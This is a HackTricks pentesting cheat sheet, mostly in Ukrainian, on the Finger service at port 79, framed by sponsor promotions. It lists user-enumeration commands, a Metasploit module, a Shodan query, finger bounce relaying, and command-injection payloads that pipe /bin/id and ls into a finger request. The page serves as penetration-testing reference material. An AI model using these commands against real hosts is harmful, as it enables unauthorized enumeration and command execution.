6.4 KiB
79 - Pentesting Finger
{% hint style="success" %}
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Миттєво доступна установка для оцінки вразливостей та тестування на проникнення. Запустіть повний pentest з будь-якого місця з 20+ інструментами та функціями, які охоплюють від розвідки до звітування. Ми не замінюємо pentester'ів - ми розробляємо спеціалізовані інструменти, модулі виявлення та експлуатації, щоб повернути їм трохи часу для глибшого аналізу, отримання доступу та розваг.
{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
Основна інформація
Програма/сервіс Finger використовується для отримання деталей про комп'ютерних користувачів. Зазвичай надається інформація, яка включає ім'я користувача, повне ім'я та, в деяких випадках, додаткові деталі. Ці додаткові деталі можуть включати місцезнаходження офісу та номер телефону (якщо доступно), час входу користувача, період бездіяльності (idle time), останній раз, коли користувач читав електронну пошту, та вміст файлів планів і проектів користувача.
Порт за замовчуванням: 79
PORT STATE SERVICE
79/tcp open finger
Перерахунок
Отримання банера/Базове з'єднання
nc -vn <IP> 79
echo "root" | nc -vn <IP> 79
Перерахування користувачів
finger @<Victim> #List users
finger admin@<Victim> #Get info of user
finger user@<Victim> #Get info of user
Альтернативно, ви можете використовувати finger-user-enum від pentestmonkey, кілька прикладів:
finger-user-enum.pl -U users.txt -t 10.0.0.1
finger-user-enum.pl -u root -t 10.0.0.1
finger-user-enum.pl -U users.txt -T ips.txt
Nmap виконує скрипт для використання стандартних скриптів
Metasploit використовує більше трюків, ніж Nmap
use auxiliary/scanner/finger/finger_users
Shodan
port:79 USER
Виконання команд
finger "|/bin/id@example.com"
finger "|/bin/ls -a /@example.com"
Finger Bounce
Використовуйте систему як реле finger
finger user@host@victim
finger @internal@external
Миттєво доступна налаштування для оцінки вразливостей та пенетестації. Запустіть повний пенетест з будь-якого місця з 20+ інструментами та функціями, які охоплюють від розвідки до звітування. Ми не замінюємо пенетестерів - ми розробляємо кастомні інструменти, модулі виявлення та експлуатації, щоб повернути їм трохи часу для глибшого аналізу, отримання доступу та розваг.
{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
{% hint style="success" %}
Вчіться та практикуйте AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Вчіться та практикуйте GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Підтримайте HackTricks
- Перевірте плани підписки!
- Приєднуйтесь до 💬 групи Discord або групи Telegram або слідкуйте за нами в Twitter 🐦 @hacktricks_live.
- Діліться хакерськими трюками, надсилаючи PR до HackTricks та HackTricks Cloud репозиторіїв на GitHub.